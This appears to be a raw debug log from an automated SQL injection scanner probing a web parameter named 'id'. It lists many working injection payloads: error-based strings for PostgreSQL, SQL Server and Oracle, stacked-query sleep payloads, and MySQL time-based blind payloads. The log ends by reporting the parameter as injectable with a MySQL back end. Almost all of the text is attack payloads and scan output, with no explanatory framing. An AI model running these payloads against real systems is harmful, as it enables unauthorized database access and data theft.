[22:40:28] [PAYLOAD] 1) AND 1955=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1955=1955) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC) AND (1927=1927
[22:40:28] [PAYLOAD] 1 AND 1955=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1955=1955) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC)
[22:40:28] [PAYLOAD] 1 AND 1955=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1955=1955) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC)-- jqzY
[22:40:28] [PAYLOAD] 1') AND 1955=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1955=1955) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC) AND ('lfLd'='lfLd
[22:40:28] [PAYLOAD] 1' AND 1955=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1955=1955) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC) AND 'SsMn'='SsMn
[22:40:28] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[22:40:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:40:28] [PAYLOAD] 1) AND 1394 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1394=1394) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113))) AND (6109=6109
[22:40:28] [PAYLOAD] 1 AND 1394 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1394=1394) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113)))
[22:40:28] [PAYLOAD] 1 AND 1394 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1394=1394) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113)))-- wNDe
[22:40:28] [PAYLOAD] 1') AND 1394 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1394=1394) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113))) AND ('Fvbh'='Fvbh
[22:40:29] [PAYLOAD] 1' AND 1394 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1394=1394) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113))) AND 'jehU'='jehU
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)' because the risk (3) is higher than the provided (1)
[22:40:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:40:29] [PAYLOAD] 1) AND 9713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9713=9713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (7429=7429
[22:40:29] [PAYLOAD] 1 AND 9713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9713=9713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)
[22:40:29] [PAYLOAD] 1 AND 9713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9713=9713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- Vrrd
[22:40:29] [PAYLOAD] 1') AND 9713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9713=9713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('Dbot'='Dbot
[22:40:29] [PAYLOAD] 1' AND 9713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9713=9713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'FRXA'='FRXA
[22:40:29] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MonetDB AND error-based - WHERE or HAVING clause' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MonetDB OR error-based - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Vertica AND error-based - WHERE or HAVING clause' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Vertica OR error-based - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 AND error-based - WHERE or HAVING clause' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 OR error-based - WHERE or HAVING clause' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (EXP)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 error-based - Parameter replace' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle error-based - ORDER BY, GROUP BY clause' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird error-based - ORDER BY clause' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 error-based - ORDER BY clause' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)' because the level (2) is higher than the provided (1)
[22:40:29] [INFO] testing 'Generic inline queries'
[22:40:29] [PAYLOAD] (SELECT CONCAT(CONCAT('qvzxq',(CASE WHEN (7640=7640) THEN '1' ELSE '0' END)),'qjxjq'))
[22:40:29] [DEBUG] skipping test 'MySQL inline queries' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL inline queries' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase inline queries' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle inline queries' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'SQLite inline queries' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird inline queries' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries (comment)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries (query SLEEP)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[22:40:29] [PAYLOAD] 1);SELECT PG_SLEEP(5)--
[22:40:29] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[22:40:29] [PAYLOAD] 1');SELECT PG_SLEEP(5)--
[22:40:29] [PAYLOAD] 1';SELECT PG_SLEEP(5)--
[22:40:29] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' because the level (3) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the level (5) is higher than the provided (1)
[22:40:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[22:40:29] [PAYLOAD] 1);WAITFOR DELAY '0:0:5'--
[22:40:29] [PAYLOAD] 1;WAITFOR DELAY '0:0:5'--
[22:40:29] [PAYLOAD] 1');WAITFOR DELAY '0:0:5'--
[22:40:29] [PAYLOAD] 1';WAITFOR DELAY '0:0:5'--
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)' because the level (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE)' because the level (5) is higher than the provided (1)
[22:40:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[22:40:29] [PAYLOAD] 1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(73)||CHR(82)||CHR(69),5) FROM DUAL--
[22:40:29] [PAYLOAD] 1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(73)||CHR(82)||CHR(69),5) FROM DUAL--
[22:40:29] [PAYLOAD] 1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(73)||CHR(82)||CHR(69),5) FROM DUAL--
[22:40:29] [PAYLOAD] 1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(73)||CHR(82)||CHR(69),5) FROM DUAL--
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' because the level (4) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP - comment)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the level (5) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query - comment)' because the risk (2) is higher than the provided (1)
[22:40:29] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query)' because the risk (2) is higher than the provided (1)
[22:40:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:40:29] [PAYLOAD] 1) AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu) AND (2294=2294
[22:40:29] [PAYLOAD] 1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu)
[22:40:29] [PAYLOAD] 1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu)-- iSrx
[22:40:29] [PAYLOAD] 1') AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu) AND ('YmVk'='YmVk
[22:40:29] [PAYLOAD] 1' AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu) AND 'cQKM'='cQKM
[22:40:34] [PAYLOAD] 1' AND (SELECT 8702 FROM (SELECT(SLEEP(0)))cfnu) AND 'cQKM'='cQKM
[22:40:34] [PAYLOAD] 1' AND (SELECT 8702 FROM (SELECT(SLEEP(5)))cfnu) AND 'cQKM'='cQKM
[22:40:39] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[22:40:39] [DEBUG] used the default behavior, running in batch mode
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:40:39] [DEBUG] used the default behavior, running in batch mode
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL AND time-based blind (ELT)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL OR time-based blind (ELT)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL AND time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL OR time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle OR time-based blind (comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Informix AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Informix OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Informix AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'Informix OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (bool)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (ELT)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (MAKE_SET)' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[22:40:39] [DEBUG] skipping test 'PostgreSQL time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
